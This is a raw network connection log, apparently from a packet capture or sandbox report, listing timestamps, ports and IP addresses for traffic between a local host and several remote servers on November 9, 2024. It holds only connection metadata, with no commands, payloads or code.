Nov 9, 2024 02:47:35.867003918 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.867007971 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.867016077 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.867050886 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.913820028 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.913844109 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.913928986 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.913928986 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.915307999 CET	443	53062	23.198.7.184	192.168.2.7
Nov 9, 2024 02:47:35.916986942 CET	53059	443	192.168.2.7	23.198.7.182
Nov 9, 2024 02:47:35.917000055 CET	443	53059	23.198.7.182	192.168.2.7
Nov 9, 2024 02:47:35.917031050 CET	53060	443	192.168.2.7	23.198.7.182
Nov 9, 2024 02:47:35.917045116 CET	443	53060	23.198.7.182	192.168.2.7
Nov 9, 2024 02:47:35.917063951 CET	53062	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:35.917073965 CET	443	53062	23.198.7.184	192.168.2.7
Nov 9, 2024 02:47:35.918153048 CET	443	53062	23.198.7.184	192.168.2.7
Nov 9, 2024 02:47:35.918217897 CET	53062	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:35.919567108 CET	53062	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:35.919641018 CET	443	53062	23.198.7.184	192.168.2.7
Nov 9, 2024 02:47:35.921403885 CET	443	53058	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.927258968 CET	53058	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.927279949 CET	443	53058	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.927443981 CET	443	53055	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.927467108 CET	443	53055	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.927548885 CET	53055	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.927558899 CET	443	53055	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.927988052 CET	53058	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.927997112 CET	443	53058	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.928697109 CET	443	53055	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.928817034 CET	53055	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.928967953 CET	53055	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.928985119 CET	443	53055	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.928993940 CET	53055	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.929063082 CET	53055	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.971110106 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.971127033 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.971138000 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.971194029 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.972476959 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.972489119 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.972546101 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.973438978 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.973450899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.973460913 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.973494053 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.973541975 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.976059914 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.976077080 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.976090908 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.976125002 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.976151943 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.977061987 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977072954 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977087975 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977107048 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977127075 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977132082 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.977149010 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977173090 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977175951 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.977185965 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977196932 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.977197886 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977214098 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977225065 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977226973 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.977236986 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977248907 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977257013 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.977288961 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.977300882 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977308035 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977309942 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.977354050 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.977365017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977377892 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977389097 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977437019 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.977504015 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977515936 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977545023 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977550030 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.977557898 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977571964 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977585077 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977593899 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.977600098 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977612019 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.977638006 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977648973 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977657080 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.977698088 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977725983 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.977735996 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.977741957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977752924 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977790117 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.977826118 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977837086 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977848053 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.977880001 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.977998972 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978010893 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978028059 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978039026 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978049040 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978049994 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978063107 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978074074 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978075981 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978085995 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978096962 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978099108 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978116035 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978120089 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978128910 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978137016 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978148937 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978161097 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978168964 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978179932 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978193998 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978204012 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978208065 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978218079 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978240967 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978247881 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978441954 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978460073 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978480101 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978486061 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978493929 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978502035 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978507042 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978518963 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978530884 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978534937 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978543997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978563070 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978574038 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978579044 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978590965 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978595018 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978601933 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978612900 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978612900 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978626966 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978643894 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978643894 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978657007 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978667974 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978668928 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978679895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978693008 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978698015 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978710890 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978723049 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978723049 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978734016 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978745937 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978760958 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978774071 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978785038 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978796005 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978801966 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978806019 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978823900 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978825092 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978837013 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978847980 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978848934 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978861094 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978868008 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978873014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978883982 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978900909 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978913069 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978923082 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978929996 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978950024 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978959084 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978959084 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978962898 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978971004 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.978976011 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978986979 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.978998899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979008913 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979008913 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.979020119 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979032040 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979033947 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.979053974 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.979094982 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.979095936 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979108095 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979118109 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979146004 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.979163885 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.979196072 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979208946 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979219913 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979232073 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979243994 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.979283094 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.979326963 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979332924 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979338884 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979379892 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.979386091 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979398966 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979408979 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979424953 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.979451895 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.979537964 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979549885 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979567051 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979598045 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.979612112 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.979634047 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979645014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979655981 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979665041 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979669094 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.979679108 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979690075 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.979691029 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979710102 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979713917 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.979722023 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979732990 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979739904 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.979744911 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979767084 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.979789019 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979795933 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.979800940 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979813099 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979830980 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979832888 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.979842901 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979847908 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.979856014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979890108 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.979913950 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.979943991 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979957104 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979968071 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979979038 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979993105 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.979993105 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.980010033 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980012894 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.980051994 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.980077982 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980098963 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980113029 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980142117 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980143070 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.980153084 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980171919 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980175018 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.980202913 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980217934 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.980251074 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.980257034 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980305910 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.980336905 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980350018 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980361938 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980385065 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.980392933 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980402946 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980487108 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.980566978 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980577946 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980590105 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980609894 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.980640888 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.980659962 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980671883 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980681896 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980695009 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980710983 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.980736017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980743885 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.980748892 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980760098 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980773926 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980784893 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980786085 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.980827093 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.980884075 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980896950 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980906963 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980916977 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980927944 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980928898 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.980952978 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.980981112 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.980988979 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.980998039 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981010914 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981028080 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.981031895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981036901 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.981050968 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981062889 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.981070042 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981081963 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.981081963 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981093884 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981105089 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981107950 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.981116056 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981132984 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981142044 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.981146097 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981156111 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981164932 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.981168985 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981182098 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981187105 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.981192112 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981204987 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981208086 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.981226921 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.981251955 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981255054 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.981262922 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981309891 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.981323957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981353998 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981365919 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981399059 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.981411934 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981422901 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981432915 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981443882 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981448889 CET	52982	80	192.168.2.7	77.220.212.32
